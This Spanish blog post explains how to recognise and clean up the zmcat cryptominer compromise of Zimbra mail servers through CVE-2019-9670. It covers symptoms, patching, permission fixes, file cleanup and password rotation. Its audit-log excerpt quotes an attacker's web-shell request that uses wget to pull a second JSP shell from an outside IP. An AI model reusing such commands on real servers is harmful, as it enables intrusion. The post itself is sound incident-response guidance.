Zimbra: Resolver zmcat “problema de webmail en blanco, error al adjuntar ficheros, AJAX webmail not loading” – CVE-2019-9670

.

Si estás usando Zimbra Collaboration y tienes cualquier de estos problemas:

• Webmail en blanco después del login
• Error al adjuntar ficheros, cuando antes no sucedía
• AJAX webmail not loading

Además de estos síntomas, estás ejecutando versiones de Zimbra inferiores a:

• Zimbra Collaboration 8.8.10 Patch 7 o 8.8.11 Patch 3
• Zimbra Collaboration 8.7.11 Patch 10
• Zimbra Collaboration 8.6 Patch 13
• Cualquier otra versión, ya sea 8.5, 8.0 o 7.x están desprotegidas

Para más información, y antes de entrar en materia, os dejo los CVE por si queréis ojearlos:

• CVE-2016-9924
• CVE-2018-20160
• CVE-2019-9670
• CVE-2019-9621

Aparte de estas vulnerabilidades, hay algunas más que se mencionan en detalle en el siguiente blog post – https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html

Primer paso – COPIA DE SEGURIDAD

¿Tenéis ya backup de vuestro Zimbra? Si tenéis la versión de Network Edition, o Zextras, estar seguros que tenéis backups. De lo contrario, o adicionalmente, descargar Veeam Agent for Linux, que incluso la versión gratuita os permitirá realizar un backup entero del sistema.

• Restaurando Servidor completo con Zimbra Collaboration 8.7 sobre Ubuntu 16.04 usando Veeam Agent para Linux

Segundo paso – ACTUALIZAR

No importa en la versión que estéis, ya sea 8.8, o 8.7 o 8.6, lo más importante es iros a la web de descargas de Zimbra, y descargar el último parche o versión. Esto es obligatorio antes de hacer nada más.

Cómo solucionar el error del WebClient en blanco (AJAX Webmail not loading)

Esta solución es muy sencilla, como simple paliativo ejecutar lo siguiente como usuario root:

Shell
cd /opt/zimbra/mailboxd find webapps -type d -exec chmod 0755 {} \; find webapps -type f -exec chmod 0644 {} \;
Y como siempre, reiniciar los servicios de Zimbra:

Shell
su - zimbra zmcontrol restart

De todas formas seguir leyendo el post porque no hemos terminado.

Cómo solucionar el error adjunto ficheros al WebClient

Esta solución es muy sencilla, como simple paliativo ejecutar lo siguiente como usuario root:

Shell
chmod 0775 /opt/zimbra/data/tmp/upload

¿Cómo comprobar si estamos infectados?

La vulnerabilidad es bastante grave y no existe un único exploit, pero lo más normal es que el exploit que se está usando al menos cree un fichero en /tmp/zmcat con lo que si tenéis ese fichero en vuestros Zimbra Collaboration, seguir leyendo.

Además de este fichero, que se trata de un miner de Bitcoin, encontraremos en /tmp dos ejecutables llamados l.sh y s.sh.

El atacante hace uso de estos scripts para crear cuentas en el sistema, usuarios simples y administradores, aparte de poner unos ficheros .jsp y .java y .class en los directorios públicos del WebClient, podemos analizar el /opt/zimbra/log/audit.log y encontraremos algo así:

Shell
2019-03-28 06:20:57,744 INFO [qtp127618319-179157:http://1.2.3.4/service/soap] [name=zimbra;oip=212.200.106.194;port=37946;ua=ZimbraWebClient - SAF3 (Win)/5.0.15_GA_2 851.RHEL5_64;] security - cmd=Auth; account=zimbra; protocol=soap; 2019-03-28 06:20:59,144 INFO [qtp127618319-179166:https:https://localhost:7071/service/admin/soap/AuthRequest] [name=zimbra;ua=ZCS/8.7.11_GA_1854;] security - cmd=AdminAuth; account=zimbra; 2019-03-28 06:20:59,144 INFO [qtp127618319-179166:https:https://localhost:7071/service/admin/soap/AuthRequest] [name=zimbra;ua=ZCS/8.7.11_GA_1854;] security - cmd=Auth; acco unt=zimbra; protocol=soap; 2019-03-28 06:20:59,294 INFO [qtp127618319-179164:https:https://127.0.0.1:7071/service/admin/soap] [name=zimbra;oip=212.200.106.194;ua=ZimbraWebClient - SAF3 (Win)/5.0.15_GA_2851.RHEL5_64;] security - cmd=AdminAuth; account=zimbra; 2019-03-28 06:20:59,295 INFO [qtp127618319-179164:https:https://127.0.0.1:7071/service/admin/soap] [name=zimbra;oip=212.200.106.194;ua=ZimbraWebClient - SAF3 (Win)/5.0.15_GA_2851.RHEL5_64;] security - cmd=Auth; account=zimbra; protocol=soap; 2019-03-28 06:21:06,355 INFO [qtp127618319-179171:https:https://127.0.0.1:7071/service/admin/soap] [name=zimbra;oip=212.200.106.194;] security - cmd=CreateAccount; name=1liu@domain.com; 2019-03-28 06:21:07,976 INFO [qtp127618319-179165:http://1.2.3.4/downloads/LU4e.jsp] [] security - cmd=Auth; account=1liu@domain.com; protocol=http_basic; 2019-03-28 06:21:10,463 INFO [qtp127618319-179170:http://1.2.3.4/downloads/LU4e.jsp?cmd=wget%20-O%20/opt/zimbra/jetty/webapps/zimbra/public/jsp/ynwD.jsp%20http://87.236.233.105/reports/tmp.txt] [] security - cmd=Auth; account=1liu@domain.com; protocol=http_basic; 2019-03-28 06:21:22,810 INFO [qtp127618319-179139:http://1.2.3.4/downloads/LU4e.jsp?cmd=/opt/zimbra/bin/zmprov%20da%201LiU@domain.com] [] security - cmd=Auth; account=1liu@domain.com; protocol=http_basic;

Recomendaciones para limpiar zmcat

Ya que no podemos estar 100% seguros del daño que ha realizado zmcat al sistema, además de las cuentas que ha creado, modificado, accedido, ficheros añadidos. Mi recomendación es que uséis la herramienta de migración de Zextras para migrar de vuestro servidor afectado a uno nuevo limpio, instalado de cero con la última versión. Ya sabéis que llevo muchos años escribiendo sobre Zimbra, con lo que espero este consejo os sirva.

Ahora bien, si queréis jugar a Indiana Jones y encontrar el tesoro oculto entre ficheros, directorios, etc.

• Comenzaremos viendo si el script se está ejecutando, y que procesos tiene con él:

Shell
ps faux | grep l\.sh

• Podéis buscar también por procesos que estén haciendo uso de wget.
• Eliminaremos todo lo que tengamos en /tmp/ por ejemplo el zmcat, los .sh, etc.
• También os recomiendo eliminar cualquier .jsp, and .java files creados en las últimas semanas, ya que seguramente tengan un nombre raro y sean parte de este ataque.
• Eliminar un fichero llamado ZimbraApps.jsp ya que es parte del ataque
• Sería recomendable cambiar todas las contraseñas del sistema, ya que el atacante ha tenido acceso completo al sistema, con lo que:

Shell
zmldappasswd zmldappasswd -r zmldappasswd -a zmldappasswd -n zmldappasswd -p zmmypasswd zmmypasswd --root

• Es más, seguramente haya conseguido las claves de SSH, con lo que si queréis también cambiar estas claves:

Shell
su - zimbra zmsshkeygen zmupdateauthkeys

Créditos
El Blog de Jorge de la Cruz